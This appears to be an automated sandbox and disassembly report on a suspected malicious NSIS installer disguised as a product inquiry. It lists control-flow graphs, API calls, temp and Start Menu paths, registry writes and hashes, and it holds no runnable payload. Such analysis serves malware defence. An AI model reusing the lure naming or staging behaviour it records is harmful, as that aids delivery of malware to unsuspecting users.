                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                              • String ID: "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                              • API String ID: 4283519449-3052279437
                              • Opcode ID: 6ee9e3ff3a5801a07d03cefed85b7338ced45a2f22c8cd65c9238745d7b7497e
                              • Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
                              • Opcode Fuzzy Hash: 6ee9e3ff3a5801a07d03cefed85b7338ced45a2f22c8cd65c9238745d7b7497e
                              • Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 431 405fc2-405fcd 432 405fe0-405ff6 431->432 433 405fcf-405fde 431->433 434 4061e7-4061eb 432->434 435 405ffc-406007 432->435 433->432 437 4061f1-4061fb 434->437 438 406019-406023 434->438 435->434 436 40600d-406014 435->436 436->434 439 406206-406207 437->439 440 4061fd-406201 call 405fa0 437->440 438->437 441 406029-406030 438->441 440->439 443 406036-40606a 441->443 444 4061da 441->444 445 406070-40607a 443->445 446 406187-40618a 443->446 447 4061e4-4061e6 444->447 448 4061dc-4061e2 444->448 449 406094 445->449 450 40607c-406080 445->450 451 4061ba-4061bd 446->451 452 40618c-40618f 446->452 447->434 448->434 455 40609b-4060a2 449->455 450->449 458 406082-406086 450->458 456 4061cb-4061d8 lstrlenA 451->456 457 4061bf-4061c6 call 405fc2 451->457 453 406191-40619d call 405efe 452->453 454 40619f-4061ab call 405fa0 452->454 469 4061b0-4061b6 453->469 454->469 460 4060a4-4060a6 455->460 461 4060a7-4060a9 455->461 456->434 457->456 458->449 464 406088-40608c 458->464 460->461 467 4060e2-4060e5 461->467 468 4060ab-4060ce call 405e87 461->468 464->449 465 40608e-406092 464->465 465->455 472 4060f5-4060f8 467->472 473 4060e7-4060f3 GetSystemDirectoryA 467->473 479 4060d4-4060dd call 405fc2 468->479 480 40616e-406172 468->480 469->456 471 4061b8 469->471 475 40617f-406185 call 40620a 471->475 477 406165-406167 472->477 478 4060fa-406108 GetWindowsDirectoryA 472->478 476 406169-40616c 473->476 475->456 476->475 476->480 477->476 481 40610a-406114 477->481 478->477 479->476 480->475 486 406174-40617a lstrcatA 480->486 483 406116-406119 481->483 484 40612e-406144 SHGetSpecialFolderLocation 481->484 483->484 488 40611b-406122 483->488 489 406162 484->489 490 406146-406160 SHGetPathFromIDListA CoTaskMemFree 484->490 486->475 492 40612a-40612c 488->492 489->477 490->476 490->489 492->476 492->484
                              APIs
                              • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060ED
                              • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,004050FF,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000), ref: 00406100
                              • SHGetSpecialFolderLocation.SHELL32(004050FF,761923A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,004050FF,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000), ref: 0040613C
                              • SHGetPathFromIDListA.SHELL32(761923A0,Call), ref: 0040614A
                              • CoTaskMemFree.OLE32(761923A0), ref: 00406156
                              • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
                              • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,004050FF,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,00000000,0041C228,761923A0), ref: 004061CC
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                              • API String ID: 717251189-485475335
                              • Opcode ID: 6fb7d4b9e0176c72f21e117460eb3ab44bee62ba2a965ffc372a20c4b8672acd
                              • Instruction ID: 67ab450255a0c50706d08a2588864b7c9a920b8361f3652e316ab2a1c483ee89
                              • Opcode Fuzzy Hash: 6fb7d4b9e0176c72f21e117460eb3ab44bee62ba2a965ffc372a20c4b8672acd
                              • Instruction Fuzzy Hash: C661E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D

                              Control-flow Graph

                              APIs
                              • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Spore,00000000,00000000,00000031), ref: 00401798
                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Spore,00000000,00000000,00000031), ref: 004017C2
                                • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Meo Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,0041C228,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,0041C228,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                • Part of subcall function 004050C7: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,004030F7,004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,0041C228,761923A0), ref: 00405123
                                • Part of subcall function 004050C7: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll), ref: 00405135
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                              • String ID: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp$C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Spore$Call
                              • API String ID: 1941528284-3935376618
                              • Opcode ID: 9b6bbad7b3b488530eb8da8d2fac4795b428d1f2831a164cb9dfb2029ea3a837
                              • Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
                              • Opcode Fuzzy Hash: 9b6bbad7b3b488530eb8da8d2fac4795b428d1f2831a164cb9dfb2029ea3a837
                              • Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 629 4050c7-4050dc 630 405192-405196 629->630 631 4050e2-4050f4 629->631 632 4050f6-4050fa call 405fc2 631->632 633 4050ff-40510b lstrlenA 631->633 632->633 635 405128-40512c 633->635 636 40510d-40511d lstrlenA 633->636 638 40513b-40513f 635->638 639 40512e-405135 SetWindowTextA 635->639 636->630 637 40511f-405123 lstrcatA 636->637 637->635 640 405141-405183 SendMessageA * 3 638->640 641 405185-405187 638->641 639->638 640->641 641->630 642 405189-40518c 641->642 642->630
                              APIs
                              • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,0041C228,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                              • lstrlenA.KERNEL32(004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,0041C228,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                              • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,004030F7,004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,0041C228,761923A0), ref: 00405123
                              • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll), ref: 00405135
                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll
                              • API String ID: 2531174081-2185715711
                              • Opcode ID: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
                              • Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
                              • Opcode Fuzzy Hash: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
                              • Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 643 402f9c-402fb0 644 402fb2 643->644 645 402fb9-402fc2 643->645 644->645 646 402fc4 645->646 647 402fcb-402fd0 645->647 646->647 648 402fe0-402fed call 4031ae 647->648 649 402fd2-402fdb call 4031c4 647->649 653 402ff3-402ff7 648->653 654 40319c 648->654 649->648 655 403147-403149 653->655 656 402ffd-403046 GetTickCount 653->656 657 40319e-40319f 654->657 661 403189-40318c 655->661 662 40314b-40314e 655->662 658 4031a4 656->658 659 40304c-403054 656->659 660 4031a7-4031ab 657->660 658->660 663 403056 659->663 664 403059-403067 call 4031ae 659->664 665 403191-40319a call 4031ae 661->665 666 40318e 661->666 662->658 667 403150 662->667 663->664 664->654 676 40306d-403076 664->676 665->654 677 4031a1 665->677 666->665 670 403153-403159 667->670 671 40315b 670->671 672 40315d-40316b call 4031ae 670->672 671->672 672->654 680 40316d-403179 call 405be0 672->680 679 40307c-40309c call 40645d 676->679 677->658 685 4030a2-4030b5 GetTickCount 679->685 686 40313f-403141 679->686 687 403143-403145 680->687 688 40317b-403185 680->688 689 4030b7-4030bf 685->689 690 4030fa-4030fc 685->690 686->657 687->657 688->670 693 403187 688->693 694 4030c1-4030c5 689->694 695 4030c7-4030f2 MulDiv wsprintfA call 4050c7 689->695 691 403133-403137 690->691 692 4030fe-403102 690->692 691->659 698 40313d 691->698 696 403104-40310b call 405be0 692->696 697 403119-403124 692->697 693->658 694->690 694->695 702 4030f7 695->702 703 403110-403112 696->703 701 403127-40312b 697->701 698->658 701->679 704 403131 701->704 702->690 703->687 705 403114-403117 703->705 704->658 705->701
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CountTick$wsprintf
                              • String ID: (TA$(TA$... %d%%
                              • API String ID: 551687249-2950751476
                              • Opcode ID: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
                              • Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
                              • Opcode Fuzzy Hash: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
                              • Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 706 40558d-4055d8 CreateDirectoryA 707 4055da-4055dc 706->707 708 4055de-4055eb GetLastError 706->708 709 405605-405607 707->709 708->709 710 4055ed-405601 SetFileSecurityA 708->710 710->707 711 405603 GetLastError 710->711 711->709
                              APIs
                              • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
                              • GetLastError.KERNEL32 ref: 004055E4
                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
                              • GetLastError.KERNEL32 ref: 00405603
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004055B3
                              • C:\Users\user\Desktop, xrefs: 0040558D
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                              • API String ID: 3449924974-26219170
                              • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                              • Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
                              • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                              • Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 712 4062ca-4062ea GetSystemDirectoryA 713 4062ec 712->713 714 4062ee-4062f0 712->714 713->714 715 406300-406302 714->715 716 4062f2-4062fa 714->716 718 406303-406335 wsprintfA LoadLibraryExA 715->718 716->715 717 4062fc-4062fe 716->717 717->718
                              APIs
                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                              • wsprintfA.USER32 ref: 0040631A
                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: DirectoryLibraryLoadSystemwsprintf
                              • String ID: %s%s.dll$UXTHEME$\
                              • API String ID: 2200240437-4240819195
                              • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                              • Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
                              • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                              • Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 719 405b68-405b72 720 405b73-405b9e GetTickCount GetTempFileNameA 719->720 721 405ba0-405ba2 720->721 722 405bad-405baf 720->722 721->720 724 405ba4 721->724 723 405ba7-405baa 722->723 724->723
                              APIs
                              • GetTickCount.KERNEL32 ref: 00405B7C
                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96
                              Strings
                              • "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe", xrefs: 00405B68
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6B
                              • nsa, xrefs: 00405B73
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CountFileNameTempTick
                              • String ID: "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                              • API String ID: 1716503409-2886283287
                              • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                              • Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
                              • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                              • Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 725 6e1316db-6e131717 call 6e131a98 729 6e131834-6e131836 725->729 730 6e13171d-6e131721 725->730 731 6e131723-6e131729 call 6e13226f 730->731 732 6e13172a-6e131737 call 6e1322b1 730->732 731->732 737 6e131767-6e13176e 732->737 738 6e131739-6e13173e 732->738 739 6e131770-6e13178c call 6e132498 call 6e131559 call 6e131266 GlobalFree 737->739 740 6e13178e-6e131792 737->740 741 6e131740-6e131741 738->741 742 6e131759-6e13175c 738->742 763 6e1317e3-6e1317e7 739->763 746 6e131794-6e1317da call 6e13156b call 6e132498 740->746 747 6e1317dc-6e1317e2 call 6e132498 740->747 744 6e131743-6e131744 741->744 745 6e131749-6e13174a call 6e1329f8 741->745 742->737 748 6e13175e-6e13175f call 6e132c83 742->748 752 6e131751-6e131757 call 6e132672 744->752 753 6e131746-6e131747 744->753 759 6e13174f 745->759 746->763 747->763 756 6e131764 748->756 762 6e131766 752->762 753->737 753->745 756->762 759->756 762->737 768 6e131824-6e13182b 763->768 769 6e1317e9-6e1317f7 call 6e13245e 763->769 768->729 771 6e13182d-6e13182e GlobalFree 768->771 775 6e1317f9-6e1317fc 769->775 776 6e13180f-6e131816 769->776 771->729 775->776 777 6e1317fe-6e131806 775->777 776->768 778 6e131818-6e131823 call 6e1314e2 776->778 777->776 779 6e131808-6e131809 FreeLibrary 777->779 778->768 779->776
                              APIs
                                • Part of subcall function 6E131A98: GlobalFree.KERNEL32(?), ref: 6E131CE7
                                • Part of subcall function 6E131A98: GlobalFree.KERNEL32(?), ref: 6E131CEC
                                • Part of subcall function 6E131A98: GlobalFree.KERNEL32(?), ref: 6E131CF1
                              • GlobalFree.KERNEL32(00000000), ref: 6E131786
                              • FreeLibrary.KERNEL32(?), ref: 6E131809
                              • GlobalFree.KERNEL32(00000000), ref: 6E13182E
                                • Part of subcall function 6E13226F: GlobalAlloc.KERNEL32(00000040,?), ref: 6E1322A0
                                • Part of subcall function 6E132672: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E131757,00000000), ref: 6E132742
                                • Part of subcall function 6E13156B: wsprintfA.USER32 ref: 6E131599
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178277557495.000000006E131000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E130000, based on PE: true
                              • Associated: 00000003.00000002.178277524359.000000006E130000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277587874.000000006E133000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277620276.000000006E135000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6e130000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc$Librarywsprintf
                              • String ID:
                              • API String ID: 3962662361-3916222277
                              • Opcode ID: 6f6253134bb6305f6f7309f8e3911e947df13b9bc2216cbee838e1f40ab04b77
                              • Instruction ID: b83c29c6f2cd7652c9a2c466968390c53c7a53cd36cf2c0a10d0baa87f2b7224
                              • Opcode Fuzzy Hash: 6f6253134bb6305f6f7309f8e3911e947df13b9bc2216cbee838e1f40ab04b77
                              • Instruction Fuzzy Hash: 4B41A271304225DACB50EFE49CD4BDA37ACBF15324F3888A5E9199A086DB74C4C9E7A0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 782 4023d6-402407 call 402acb * 2 call 402b5b 789 402957-402966 782->789 790 40240d-402417 782->790 791 402427-40242a 790->791 792 402419-402426 call 402acb lstrlenA 790->792 795 40242c-40243d call 402aa9 791->795 796 40243e-402441 791->796 792->791 795->796 800 402452-402466 RegSetValueExA 796->800 801 402443-40244d call 402f9c 796->801 803 402468 800->803 804 40246b-402548 RegCloseKey 800->804 801->800 803->804 804->789 807 40271c-402723 804->807 807->789
                              APIs
